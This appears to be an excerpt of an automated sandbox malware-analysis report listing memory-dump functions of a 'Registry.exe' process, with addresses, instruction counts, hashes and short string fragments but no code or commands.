Instruction ID: 012f48fea5f281945e054f13447e6382eb097f955b2a877f8a66915f977f3bce
Opcode Fuzzy Hash: b57c62b257574cf024eb4673085bce57fa8ab25f321e6c78dd162f7c236be2a6
Instruction Fuzzy Hash: F6418171E1E74E8EEB689AA888652FD7BE0EF45300F46057AD408D61F2DE28A604C712

Function 00007FFD9B760500 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1969327567.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9b760000_Registry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0248142db6381897d453c1816c677eb0919690b043873861f2b1a41d071b63b8
Instruction ID: 2fbab578f39945fbee6942f4b70759c6da5c66fe43cba305541d986ba1f25496
Opcode Fuzzy Hash: 0248142db6381897d453c1816c677eb0919690b043873861f2b1a41d071b63b8
Instruction Fuzzy Hash: 3F41D531A1E78E8FEB95EFA488685A93BF0FF25300F0545B6D419C70B2DA38E554CB01

Function 00007FFD9B760805 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1969327567.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9b760000_Registry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c2bf18e6deead0ff9fae1e6ec9824b38924bae04e08c19d0abf892cfe9d49f4
Instruction ID: 88e115e6026d9fea6585a9c951d2858f8b08c862d53d6cee691b0f62c92102eb
Opcode Fuzzy Hash: 5c2bf18e6deead0ff9fae1e6ec9824b38924bae04e08c19d0abf892cfe9d49f4
Instruction Fuzzy Hash: C0317E22A4F38BDFE72167B888B51E93BD0FF11714F0601B7D058C90B7ED186559C282

Function 00007FFD9B7611B0 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1969327567.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9b760000_Registry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07fe1bdc6d49fb1bc96bbbdeafbb35b90fc65f1fb879535ee46df8a572062169
Instruction ID: 4a646de694ddbb21c9efae2bd113a1f3de7bfd361ea25baa3923fc32db99105c
Opcode Fuzzy Hash: 07fe1bdc6d49fb1bc96bbbdeafbb35b90fc65f1fb879535ee46df8a572062169
Instruction Fuzzy Hash: 4431C331F0A64E8FEBA8DBA888686FD77E0FF55310F05117AD019D35F2DA246A148742

Function 00007FFD9B762E38 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1969327567.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9b760000_Registry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9989bfaa968b13ea770dd501d9fdca4471bbbc52026381b27d33cf813558bd4
Instruction ID: e68703a3c0004457be0cbc3ddeeb6c8756b39e977f58f90cba373ce6dca256a9
Opcode Fuzzy Hash: f9989bfaa968b13ea770dd501d9fdca4471bbbc52026381b27d33cf813558bd4
Instruction Fuzzy Hash: F3419431E0E78ECEE7A19BB488296FA7BE0EF55310F050676D404D61F2EA78A644C742

Function 00007FFD9B763160 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1969327567.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9b760000_Registry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d023334512f88b09528b75e3841f171252bc46dc46d70393de8586013545815e
Instruction ID: 335aa7fc20cf98fe518b2a18ff06494def3429b1c713e2032118043c78178069
Opcode Fuzzy Hash: d023334512f88b09528b75e3841f171252bc46dc46d70393de8586013545815e
Instruction Fuzzy Hash: D5315E31E1A74ECEEB689AA8C8647FD77B0EF45310F56023AD009D71B1DE386644CB12

Function 00007FFD9B76C6E0 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1969327567.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9b760000_Registry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b119d56009b059bad8c75763b6def154cef25bfaeec2a80d8f4f330337daea6c
Instruction ID: 39b1249e822f2d13b0674cb086879e0fa3154b3aee2c3815d46a56299fe55c6a
Opcode Fuzzy Hash: b119d56009b059bad8c75763b6def154cef25bfaeec2a80d8f4f330337daea6c
Instruction Fuzzy Hash: D131FF71E0DA1D8FEBA4EBA8D8A56ACB7B1FF59300F51027AD00DD72A2DE2569018741

Function 00007FFD9B76CDF0 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1969327567.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9b760000_Registry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d259180aa67108dd1de87064e29053939cfbfddeabd3513db48f8c4031ca62bb
Instruction ID: 57b25811edc45f2fa2d5f755beb02477c4ce530c65d1d00f16c0ad3ed0efb753
Opcode Fuzzy Hash: d259180aa67108dd1de87064e29053939cfbfddeabd3513db48f8c4031ca62bb
Instruction Fuzzy Hash: 4731C136A0E79A8FD716AB7898254F93FB0EF16310B0901FBD059CB0A3CE296848C751

Function 00007FFD9B760A01 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1969327567.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9b760000_Registry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e984d5c7f6299b791f82ab44d37b391db4d6a98e270aea3355c41b6a191ecded
Instruction ID: c8629d0aec54420ba306368302382ed899a4b87f373794c422163a6207e5111c
Opcode Fuzzy Hash: e984d5c7f6299b791f82ab44d37b391db4d6a98e270aea3355c41b6a191ecded
Instruction Fuzzy Hash: D921B835E1E70E8EE7A0EBA888A95B977E1FF54740F414676D41CC60BAEE34A6448701

Function 00007FFD9B76D856 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1969327567.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9b760000_Registry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5da9bdbdcd1e506bdae34596276013376171a6690f59ac524b9f24a5c7a7e3f7
Instruction ID: 47ad90123be4374b67c19c63702774439bf6493bec4fa2a1cdd2facda6f0d1d2
Opcode Fuzzy Hash: 5da9bdbdcd1e506bdae34596276013376171a6690f59ac524b9f24a5c7a7e3f7
Instruction Fuzzy Hash: 2D21D870E1961ECFDB64EFD8D4656FDBBB0FF59310F11013AD009E22A1DA386A448B55

Function 00007FFD9B7626B8 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1969327567.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9b760000_Registry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a01dbbfa514a04b35c0a85ecec4f3824edd1ef2379cf512fdef2a95183879346
Instruction ID: e2c640f55106750a7476fe255ffaec2c1f6fafcaecd6defbc8cf49efecf3d736
Opcode Fuzzy Hash: a01dbbfa514a04b35c0a85ecec4f3824edd1ef2379cf512fdef2a95183879346
Instruction Fuzzy Hash: AC11D53190E38E8FEBA99F6488655B93BA0FF15300F1505BAD819C31B1DB34A514C741

Function 00007FFD9B7604F8 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1969327567.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9b760000_Registry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 299bd263e4c6aa28444e05be62015bbd391e7b1df098a6761fb33b834349939b
Instruction ID: 59e738e52416ed4c0119dc4aed4ec75ab0641dc2ff2110a0caff5ef7060ace56
Opcode Fuzzy Hash: 299bd263e4c6aa28444e05be62015bbd391e7b1df098a6761fb33b834349939b
Instruction Fuzzy Hash: 7A11B931A1E78ECFEBA99FA488246B937A0FF15304F4105BAD819C61F1DB38A554CB42

Function 00007FFD9B7631C8 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1969327567.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9b760000_Registry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 784a018e86252a0ca9d6ca2ada5c79914686041292f5a1da3839df1597d8441f
Instruction ID: 35f8fa26e696b699825de332c5f8b8a40b685a1658ea6f027f94032da3111509
Opcode Fuzzy Hash: 784a018e86252a0ca9d6ca2ada5c79914686041292f5a1da3839df1597d8441f
Instruction Fuzzy Hash: AC215E71E1A74E9EEB68DBD8D4607BD76B1BF45300F520139D009A62F1DF786A04CB12

Function 00007FFD9B7605D8 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1969327567.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9b760000_Registry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2826b283d7b9d03c657fd2d40855226e6eb688752736f123b2d7388db8b95cbe
Instruction ID: ad2943ae204fe41ce1a297d2b785b83cf30e1b23d7a94bc6bd3833be2a0d4576
Opcode Fuzzy Hash: 2826b283d7b9d03c657fd2d40855226e6eb688752736f123b2d7388db8b95cbe
Instruction Fuzzy Hash: F411E130A0A78E8FDB64EF6484695BD3BA1FF15300F1155BEC409C78F2DA356544C701

Function 00007FFD9B76BC27 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1969327567.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9b760000_Registry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e36355e5b17d10d46b9b54a385717e624bc79952abb2a4b9bda4e41f00582904
Instruction ID: 70f191fcc39617109b023700c42b08de1b2cde0b7b2d5006f273c85cfa4e8bb1
Opcode Fuzzy Hash: e36355e5b17d10d46b9b54a385717e624bc79952abb2a4b9bda4e41f00582904
Instruction Fuzzy Hash: 99019070E1561DDEEBA5EB54C865AECB6B1FF58300F5142B6D40DE22A1EF345A80CF11

Function 00007FFD9B760608 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1969327567.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9b760000_Registry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3c5fef063953de2a7c5e9b2ab4c0a0ba38a7b6ca79b954cd1e93d54c7c7c5e4
Instruction ID: eaed6aa92ca17a7fe8bec531b19b4f16256468af19ff24d3d5b76c339ef94ae6
Opcode Fuzzy Hash: e3c5fef063953de2a7c5e9b2ab4c0a0ba38a7b6ca79b954cd1e93d54c7c7c5e4
Instruction Fuzzy Hash: F9018130A1960ECFEB9DEBA4C468AB973A0FF18305F51097ED41ED61F5DE35A650CA01

Function 00007FFD9B760610 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1969327567.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9b760000_Registry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b38fbf42de24bb08fb0210d499b536868e2224bfd283aa606bbc8a4f22b79fc6
Instruction ID: 9968c028a12b094dbab461df0301ec1dbf8096678b62e0799644ebbd74578ecc
Opcode Fuzzy Hash: b38fbf42de24bb08fb0210d499b536868e2224bfd283aa606bbc8a4f22b79fc6
Instruction Fuzzy Hash: 98018630A1560EDEDB9CEBA4C468AB973A0FF18305F51097ED41EC21F5DE35A550CB11

Function 00007FFD9B76BBD2 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1969327567.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9b760000_Registry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1ae7d8d5d41747649d2284b443548cf3105859956909e72e14a1a97eaebe8ff
Instruction ID: 2a8a9f44903ac4d923648cea1f9d85d6a503e4009207789ae1568b5c643d6437
Opcode Fuzzy Hash: c1ae7d8d5d41747649d2284b443548cf3105859956909e72e14a1a97eaebe8ff
Instruction Fuzzy Hash: 7E01C970E0561DCEEB60DF94C865BECB6F0FB18310F1542AAD409E72A1DB786A848B15

Function 00007FFD9B76278D Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1969327567.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9b760000_Registry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50d80e887ba4b90ffde8ee31440b48a2edac2a1954f1ed1224d2ba9fc1480334
Instruction ID: 276fa78bcfb6b0e4919415abac6b89723c08112c69ed9b9154d8b8dc2dc6f8a6
Opcode Fuzzy Hash: 50d80e887ba4b90ffde8ee31440b48a2edac2a1954f1ed1224d2ba9fc1480334
Instruction Fuzzy Hash: D0F0F630A0E78D8FDBAD9FB088255A93BA0FF05300F4105BED509C60F2DB389554CB01

Function 00007FFD9B76BCCC Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1969327567.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9b760000_Registry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ed84bb9ce917c70af2842c91857d3b874ab856033e646a712be2037a1384966
Instruction ID: 9acd313e245ee1518f2c683665a7202fbbf65ab4605b3c76d8436770907b5962
Opcode Fuzzy Hash: 2ed84bb9ce917c70af2842c91857d3b874ab856033e646a712be2037a1384966
Instruction Fuzzy Hash: 08F01D70A19A1D8EDBA4EB58C851BA977B1FB58340F1142A6C40DD32A5CE34AE858B40

Function 00007FFD9B760F6B Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1969327567.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9b760000_Registry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e7522acd6451ebeda37a38ed7de871bbf4ada2ed5ac86d0f58e8156bdff23d0
Instruction ID: d383dcb09a401517df66973346734099450aa1a0b10bce6742488ef0672578cf
Opcode Fuzzy Hash: 5e7522acd6451ebeda37a38ed7de871bbf4ada2ed5ac86d0f58e8156bdff23d0
Instruction Fuzzy Hash: 36F0B734A1A50DCEEB24EB54C864FED76F1FB58305F1142BAD00AA32A9DE346E418B45

Non-executed Functions

Function 00007FFD9B76F323 Relevance: 7.6, Strings: 6, Instructions: 90COMMON

Download Yara Rule

Strings

[, xrefs: 00007FFD9B76F337
%, xrefs: 00007FFD9B76F455
", xrefs: 00007FFD9B76F3E1
-, xrefs: 00007FFD9B76F3AB
Y, xrefs: 00007FFD9B76F3F1
Q, xrefs: 00007FFD9B76F344

Memory Dump Source

Source File: 00000020.00000002.1969327567.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9b760000_Registry.jbxd

Similarity

API ID:
String ID: "$%$-$Q$Y$[
API String ID: 0-819147419
Opcode ID: e17550e20cec20965159f4854074ef033509340bf3c0eebe2bcc0037eca4e643
Instruction ID: 07c8cab08ec53b01de620862d9eeff8220656bb7e64d8581318d897789bc52d4
Opcode Fuzzy Hash: e17550e20cec20965159f4854074ef033509340bf3c0eebe2bcc0037eca4e643
Instruction Fuzzy Hash: 0A41E670E0562ECFDB68DF50C8A47E9B7B2AF58301F4001F9D44DA62A1DB785A84DF51

Function 00007FFD9B76387E Relevance: 5.1, Strings: 4, Instructions: 102COMMON

Download Yara Rule

Strings

8S^, xrefs: 00007FFD9B7638D4
0S^I, xrefs: 00007FFD9B763944
/S^I, xrefs: 00007FFD9B763924
.S^I, xrefs: 00007FFD9B763954

Memory Dump Source

Source File: 00000020.00000002.1969327567.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9b760000_Registry.jbxd

Similarity

API ID:
String ID: .S^I$/S^I$0S^I$8S^
API String ID: 0-1686825896
Opcode ID: 8f7509122fdf9a95f10b824dfc823fbb858197446391c1fe41f0ee7fdbc415c1
Instruction ID: 9c5e48f18ca5c8ee4f0fb7c5d79f217f97f4b016688f62ebc9f2a4c8af83b730
Opcode Fuzzy Hash: 8f7509122fdf9a95f10b824dfc823fbb858197446391c1fe41f0ee7fdbc415c1
Instruction Fuzzy Hash: B431B14260F7CA4FE72246BC0C352953FE4EF5313475A02EBD1A8CA0F7E5185A59C3A2

Function 00007FFD9B76F0E3 Relevance: 5.1, Strings: 4, Instructions: 67COMMON

Download Yara Rule

Strings

%, xrefs: 00007FFD9B76F455
", xrefs: 00007FFD9B76F3E1
-, xrefs: 00007FFD9B76F3AB
Y, xrefs: 00007FFD9B76F3F1

Memory Dump Source

Source File: 00000020.00000002.1969327567.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9b760000_Registry.jbxd

Similarity

API ID:
String ID: "$%$-$Y
API String ID: 0-2898851251
Opcode ID: 6583d015ba74d59f39ffa0d79bb0feb07f15a3abb35d323aac80b6099dba6303
Instruction ID: f731ea541512f7bb9a943338f83f6d9096d3af0a0631a69471b2dd91dbf05c1e
Opcode Fuzzy Hash: 6583d015ba74d59f39ffa0d79bb0feb07f15a3abb35d323aac80b6099dba6303
Instruction Fuzzy Hash: A631D470A0962ECFDB68DF54C8A47E9B7B2AF58301F5002F9D40DA62A1CB785A80CF51

Analysis Process: Registry.exePID: 2568, Parent PID: 1044COMMON

Executed Functions

Function 00007FFD9B773565 Relevance: .3, Instructions: 304COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1968629942.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b770000_Registry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35364620be2bc77715a2ae3ea655037cc77d6278b7a1bf5efadb825d773e2438
Instruction ID: 47fb7901802f10bee0144d4d547fee12b95f30bc1b8dcfed3d26cfdc352b0477
Opcode Fuzzy Hash: 35364620be2bc77715a2ae3ea655037cc77d6278b7a1bf5efadb825d773e2438
Instruction Fuzzy Hash: 2DA1C171A19A4E8FEB94DB68C8657AD7BE1FF5A300F5102BAD00DD32E5DFB829058740

Function 00007FFD9B77EB07 Relevance: 11.5, Strings: 9, Instructions: 232COMMON

Download Yara Rule

Strings

E, xrefs: 00007FFD9B7800AB
{, xrefs: 00007FFD9B77FFC7
X, xrefs: 00007FFD9B77ECF0
7, xrefs: 00007FFD9B77EB61
I, xrefs: 00007FFD9B77EB14
}, xrefs: 00007FFD9B77ED47
L, xrefs: 00007FFD9B77FB0B
{, xrefs: 00007FFD9B77ECE7
K, xrefs: 00007FFD9B77ED80

Memory Dump Source

Source File: 00000023.00000002.1968629942.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b770000_Registry.jbxd

Similarity

API ID:
String ID: 7$E$I$K$L$X${${$}
API String ID: 0-1139972885
Opcode ID: ffff7fc36382905bae5ac3fc2894029bdd88b66f328da2da2719d233c7a3969f
Instruction ID: 5dc7a2a6732e8250ad01a57a364ec09085baa06983a8ce12a7858e81e08cb487
Opcode Fuzzy Hash: ffff7fc36382905bae5ac3fc2894029bdd88b66f328da2da2719d233c7a3969f
Instruction Fuzzy Hash: D4B1C670A0966D8FEBA8DF14C8A4BA9B7B1FF58301F0101E9D44DE72A1DB746A80CF44

Function 00007FFD9B77F464 Relevance: 3.9, Strings: 3, Instructions: 141COMMON

Download Yara Rule

Strings

_, xrefs: 00007FFD9B780498
Z, xrefs: 00007FFD9B77F471
A, xrefs: 00007FFD9B780434

Memory Dump Source

Source File: 00000023.00000002.1968629942.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b770000_Registry.jbxd

Similarity

API ID:
String ID: A$Z$_
API String ID: 0-3891705896
Opcode ID: 9c1b5fc9c9cb4d5a99e26f3698015da711ee13f26f024b93f3f664c66dbcb634
Instruction ID: 4be3a37a3f212d25845f81355baf7a24b20b4cabf8e80d5539551e0fa3f4936e
Opcode Fuzzy Hash: 9c1b5fc9c9cb4d5a99e26f3698015da711ee13f26f024b93f3f664c66dbcb634
Instruction Fuzzy Hash: 6751F971E1561D8FDBA8DF58C8A9BA8B7B1FF58301F1002E9D10DA32A1CF746A818F45

Function 00007FFD9B77D09A Relevance: 2.9, Strings: 2, Instructions: 355COMMON

Download Yara Rule

Strings

crM, xrefs: 00007FFD9B77D252
sM_^, xrefs: 00007FFD9B77D101

Memory Dump Source

Source File: 00000023.00000002.1968629942.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b770000_Registry.jbxd

Similarity

API ID:
String ID: sM_^$crM
API String ID: 0-1960740903
Opcode ID: 959770e2bce43b1bb54a71da7fbf7331234dcf333881e94eb65fe701a33f38fa
Instruction ID: c45d6858915ec28318cc213994de25e1cd3d3782794a4a692c94380dcb1f2889
Opcode Fuzzy Hash: 959770e2bce43b1bb54a71da7fbf7331234dcf333881e94eb65fe701a33f38fa
Instruction Fuzzy Hash: F1B13436B0D64E8AE710BBACE8A96FD77A0EF51325F0506B7D04DC70A6DE34A1458690

Function 00007FFD9B77DDA9 Relevance: 1.6, Strings: 1, Instructions: 394COMMON

Download Yara Rule

Strings

U, xrefs: 00007FFD9B77DDBA

Memory Dump Source

Source File: 00000023.00000002.1968629942.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b770000_Registry.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: 4d150dcb403b41623a2d84212cd7b52f8f62f9461a5fb0b3aba95212f4152eaf
Instruction ID: 466e8ee6b0156ac2a89abe239874b459180bde0b394d48eeecd4ac8f934a71ab
Opcode Fuzzy Hash: 4d150dcb403b41623a2d84212cd7b52f8f62f9461a5fb0b3aba95212f4152eaf
Instruction Fuzzy Hash: 73E15D71E1965D8FDB68DFA8C4A5BBCB7A1FF58300F1401BAD01DD32A6CA746940CB40

Function 00007FFD9B77CC1F Relevance: 1.5, Strings: 1, Instructions: 251COMMON

Download Yara Rule

Strings

%w, xrefs: 00007FFD9B77CCCE

Memory Dump Source

Source File: 00000023.00000002.1968629942.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b770000_Registry.jbxd

Similarity

API ID:
String ID: %w
API String ID: 0-4253275273
Opcode ID: 83b5e47969d5456328b042fb1ed80b11c0397eb0f4c6b423cadf946eb60604b3
Instruction ID: 73bf1d9c94eb10bf36a85290d0f754c376ba4c0516eed997c03ba1467d08b76c
Opcode Fuzzy Hash: 83b5e47969d5456328b042fb1ed80b11c0397eb0f4c6b423cadf946eb60604b3
Instruction Fuzzy Hash: A471352BB4D66B4EE3243BBCB8614FC7B50EF55331B0902B3E15C8A0E3DE5835458694

Function 00007FFD9B771CCD Relevance: 1.4, Strings: 1, Instructions: 186COMMON

Download Yara Rule

Strings

L, xrefs: 00007FFD9B771CDA

Memory Dump Source

Source File: 00000023.00000002.1968629942.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b770000_Registry.jbxd

Similarity

API ID:
String ID: L
API String ID: 0-2909332022
Opcode ID: 01dd69df8be893bb30597c943c3d9a7bbcf427e33b8bdbf7993735365b248e99
Instruction ID: e0a50fc50a39b1fbf43dc258af0a9cc4c7d26c8ef34a9df9157ade3f4952eacf
Opcode Fuzzy Hash: 01dd69df8be893bb30597c943c3d9a7bbcf427e33b8bdbf7993735365b248e99
Instruction Fuzzy Hash: 7751C131B19B894FDB58DE5888A46BA77E2FF98305B15427ED45EC32A1CE74E8028781

Function 00007FFD9B7720E5 Relevance: 1.4, Strings: 1, Instructions: 142COMMON

Download Yara Rule

Strings

U, xrefs: 00007FFD9B7721AA

Memory Dump Source

Source File: 00000023.00000002.1968629942.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b770000_Registry.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: d9018ff169e2f79c8df6324f467bfe66532118cf149f620a78955303d29cfa3e
Instruction ID: 922a9de7a1df5128e3fd72571b23b49dd486054445b34aca271d565968a5f336
Opcode Fuzzy Hash: d9018ff169e2f79c8df6324f467bfe66532118cf149f620a78955303d29cfa3e
Instruction Fuzzy Hash: E6411331F1EA4E4FE765EBB888A55B877D0EF86300F0642B6D41CC71F6DE68A9418351

Function 00007FFD9B7731B1 Relevance: 1.4, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

U, xrefs: 00007FFD9B7731CA

Memory Dump Source

Source File: 00000023.00000002.1968629942.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b770000_Registry.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: c2681c3c501b5520d721bd00abfba6b68fd7874bef84ed508aa457c1c1af2c6b
Instruction ID: 125f474ee9f98b83503383c434c786f216f820fa5b6bc3c86f26a9a1a747beb0
Opcode Fuzzy Hash: c2681c3c501b5520d721bd00abfba6b68fd7874bef84ed508aa457c1c1af2c6b
Instruction Fuzzy Hash: 4F419C70E0A60E8FEB64DB94C4A47FD7BB1EF45311F56023AC009A71A1DEB8A7458B10

Function 00007FFD9B77C668 Relevance: 1.4, Strings: 1, Instructions: 108COMMON

Download Yara Rule

Strings

R_H, xrefs: 00007FFD9B77C673

Memory Dump Source

Source File: 00000023.00000002.1968629942.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b770000_Registry.jbxd

Similarity

API ID:
String ID: R_H
API String ID: 0-1985012337
Opcode ID: 9d01236b6dc5ae12f9c3cf225e02b44b7dad18293a51fb1ebdd289ef4bb0fcab
Instruction ID: 237619041a7a248916420d154623c912e3347bcaff7cf6d9157d200e04976bd6
Opcode Fuzzy Hash: 9d01236b6dc5ae12f9c3cf225e02b44b7dad18293a51fb1ebdd289ef4bb0fcab
Instruction Fuzzy Hash: EE310071E09A1D8FDBA4EBA8D4A56BCB7B1FF99300F51027AD00DD7261DF7469418B40

